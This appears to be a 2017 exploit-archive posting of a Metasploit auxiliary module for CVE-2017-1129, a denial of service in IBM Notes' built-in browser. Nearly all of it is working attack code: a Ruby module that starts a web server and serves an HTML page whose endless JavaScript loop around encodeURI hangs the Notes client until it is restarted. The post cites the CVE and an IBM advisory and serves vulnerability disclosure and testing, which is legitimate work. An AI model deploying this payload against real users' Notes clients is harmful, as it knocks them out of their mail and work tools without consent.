IBM Notes 8.5 / 9.0 encodeURI Denial Of Service
Posted on 11 October 2017
#Here is an MSF Module for CVE-2017-1129 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => "IBM Notes encodeURI DOS", 'Description' => %q( This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, it could cause the Notes client to hang and have to be restarted. ), 'License' => MSF_LICENSE, 'Author' => [ 'Dhiraj Mishra', ], 'References' => [ [ 'EXPLOIT-DB', '42602'], [ 'CVE', '2017-1129' ], [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid= swg21999385' ] ], 'DisclosureDate' => 'Aug 31 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' ) ) end def run exploit # start http server end def setup @html = %| <html><head><title>DOS</title> <script type="text/javascript"> while (true) try { var object = { }; function d(d0) { var d0 = (object instanceof encodeURI)('foo'); } d(75); } catch (d) { } </script> </head></html> | end def on_request_uri(cli, _request) print_status('Sending response') send_response(cli, @html) end end URL :https://github.com/rapid7/metasploit-framework/blob/ master/modules/auxiliary/dos/http/ibm_lotus_notes.rb Thank you -- Regards *Dhiraj Mishra.*GPG ID : 51720F56 | Finger Print : 1F6A FC7B 05AA CF29 8C1C ED65 3233 4D18 5172 0F56
